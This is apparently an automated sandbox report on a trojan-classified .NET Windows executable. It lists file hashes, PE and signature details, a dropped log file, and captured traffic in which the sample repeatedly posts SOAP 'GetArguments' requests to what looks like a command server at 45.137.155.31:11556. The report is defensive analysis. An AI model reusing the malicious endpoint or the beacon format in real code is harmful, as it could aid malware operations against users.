
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  45.137.155.31
                                  unknownRussian Federation
                                  25229VOLIA-ASUAtrue

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:458960
                                  Start date:03.08.2021
                                  Start time:23:07:20
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 7m 39s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:26
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal68.troj.winEXE@3/1@0/1
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 0% (good quality ratio 0%)
                                  • Quality average: 17%
                                  • Quality standard deviation: 34%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                  • HTTP Packets have been reduced
                                  • TCP Packets have been reduced to 100
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  23:08:05API Interceptor1x Sleep call for process: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  VOLIA-ASUATpZ10Hfjov.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  o12nY1xwUl.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  R4qgfTvaiK.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  AR2rPMLtaN.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  gji54VjOlPGet hashmaliciousBrowse
                                  • 93.75.73.91
                                  flJrVwWebP.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  bHC6bZhkMz.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  4Dm89IWqe9.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  5mr8riiH5q.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  YoKh9rD5xR.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  Oyu6AMjXZH.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  vhTZ5hgW6jGet hashmaliciousBrowse
                                  • 93.74.47.236
                                  gNt5Z08t0Y.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  EpLr3m6ArC.exeGet hashmaliciousBrowse
                                  • 77.123.139.190
                                  Ace_Stream_Media_3.1.32.exeGet hashmaliciousBrowse
                                  • 77.120.105.71
                                  120mAT7jpAGet hashmaliciousBrowse
                                  • 93.77.37.56
                                  Lkm548STLfGet hashmaliciousBrowse
                                  • 93.75.8.58
                                  TCMKnazFHfGet hashmaliciousBrowse
                                  • 77.121.115.127
                                  U9ZCIleOACGet hashmaliciousBrowse
                                  • 93.72.90.114
                                  C2XcSV0eL7Get hashmaliciousBrowse
                                  • 93.74.243.200

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.log
                                  Process:C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1299
                                  Entropy (8bit):5.353835388147306
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                  MD5:D7428B0428DC5FA72A41122D265CFA0E
                                  SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                  SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                  SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):6.58992019616862
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                  • Windows Screen Saver (13104/52) 0.07%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  File size:364240
                                  MD5:2e18a08987838bbc3c26ffdbbcec1e62
                                  SHA1:2dd67d0c7191ab3380bc4a1b9ca3a09c684a2291
                                  SHA256:7c3beb3d9b0a8e0bdc6344a24b3b527b96cb9c845aa6847d8ac9d192f68ff912
                                  SHA512:bab4ef07f12fa241c3390550f75e2beeea344b44c6216c74d8ddca1de97a02c27f77d2d38238bc708590aa45e3fea4ede744fb26010e0deb6eb35169d8212944
                                  SSDEEP:6144:5bchiOsbOe04ety4saEH8heP9UBcemgMrXsTM:RTaepetyras8hM9UB8cTM
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.`..............0......^......R.... ........@.. ...............................`....@................................

                                  File Icon

                                  Icon Hash:e8e6eae6b292c26e

                                  Static PE Info

                                  General

                                  Entrypoint:0x42bb52
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x60D847E7 [Sun Jun 27 09:41:59 2021 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Authenticode Signature

                                  Signature Valid:false
                                  Signature Issuer:CN=ColumnHeaderCollection
                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                  Error Number:-2146762487
                                  Not Before, Not After
                                  • 6/26/2021 11:00:00 AM 6/27/2024 12:00:00 AM
                                  Subject Chain
                                  • CN=ColumnHeaderCollection
                                  Version:3
                                  Thumbprint MD5:CF93BA345DF2747B2CF53ABC293CB913
                                  Thumbprint SHA-1:C4BE4F3585EF8282812D7BDAB5E5A1F5AA6BD7F8
                                  Thumbprint SHA-256:D3467EDC946463A56CCACC44EFB99073D816EAEB249D14968A79417E4253F66B
                                  Serial:723CD9354EC38F03

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2baf80x57.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x2c030.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x562000x2cd0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x24a4c0x1c.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x29b580x29c00False0.775870134731data7.50941268753IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .reloc0x2c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  .rsrc0x2e0000x2c0300x2c200False0.220221759915data4.87437214898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_ICON0x2e2680x417fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                  RT_ICON0x323e80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                  RT_ICON0x42c100x94a8data
                                  RT_ICON0x4c0b80x5488data
                                  RT_ICON0x515400x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 192, next used block 4282318872
                                  RT_ICON0x557680x25a8data
                                  RT_ICON0x57d100x10a8data
                                  RT_ICON0x58db80x988data
                                  RT_ICON0x597400x468GLS_BINARY_LSB_FIRST
                                  RT_GROUP_ICON0x59ba80x84data
                                  RT_VERSION0x59c2c0x404data

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Version Infos

                                  DescriptionData
                                  Translation0x0000 0x04b0
                                  LegalCopyrightCopyright (c) CRFML Corporation. All rights reserved.
                                  Assembly Version434.356.138.555
                                  InternalNameMethodAttributes.exe
                                  FileVersion248.995.351.388
                                  CompanyNameCRFML Corporation.
                                  CommentsLicensed Delegated
                                  ProductNameCRFML The Real Fish Delegate.
                                  ProductVersion248.995.351.388
                                  FileDescriptionFish Delegates
                                  OriginalFilenameMethodAttributes.exe

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 3, 2021 23:08:34.539272070 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:34.608829975 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:34.608943939 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:34.775641918 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:34.844460011 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:34.844919920 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:34.935828924 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:35.116533041 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:37.872083902 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:37.942097902 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:37.945636034 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:38.016057968 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:38.226187944 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:39.024693966 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:39.095200062 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:39.226295948 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:39.496062994 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:39.572225094 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:39.616928101 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:41.002532959 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:41.071475029 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:41.071873903 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:41.141886950 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:41.226475954 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:42.211414099 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:42.282383919 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:42.286588907 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:42.371978998 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:42.523458004 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:43.383331060 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:43.454222918 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:43.454910040 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:43.525957108 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:43.570585966 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:44.539746046 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:44.608695984 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:44.609221935 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:44.682656050 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:44.726794958 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:45.696274042 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:45.774158001 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:45.774604082 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:45.843389034 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:45.883111954 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:46.852746964 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:46.924748898 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:46.925151110 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:46.996185064 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:47.039469957 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:48.008903027 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:48.078175068 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:48.078557014 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:48.147993088 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:48.195836067 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:49.165903091 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:49.234884024 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:49.235312939 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:49.304136038 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:49.352307081 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:50.322942019 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:50.392438889 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:50.392863035 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:50.462193012 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:50.508629084 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:51.477946997 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:51.549185991 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:51.549530029 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:51.622066975 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:51.664973974 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:52.634804010 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:52.703515053 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:52.706039906 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:52.777390957 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:52.821343899 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:53.791714907 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:53.861747026 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:53.862258911 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:53.933701992 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:53.977737904 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:54.947076082 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:55.031856060 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:55.032232046 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:55.106903076 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:55.149503946 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:56.118983030 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:56.187716007 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:56.190704107 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:56.261271954 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:56.305851936 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:57.275489092 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:57.345042944 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:57.345726967 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:57.427540064 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:57.477873087 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:58.431857109 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:58.501523018 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:58.502108097 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:58.572072029 CEST115564972545.137.155.31192.168.2.3
                                  Aug 3, 2021 23:08:58.618643045 CEST4972511556192.168.2.345.137.155.31
                                  Aug 3, 2021 23:08:59.715187073 CEST4972511556192.168.2.345.137.155.31

                                  HTTP Request Dependency Graph

                                  • 45.137.155.31:11556

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.34972545.137.155.3111556C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  TimestampkBytes transferredDirectionData
                                  Aug 3, 2021 23:08:34.775641918 CEST981OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive
                                  Aug 3, 2021 23:08:34.844460011 CEST981INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:34.935828924 CEST983INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:34 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:37.872083902 CEST1033OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:37.942097902 CEST1033INHTTP/1.1 100 Continue
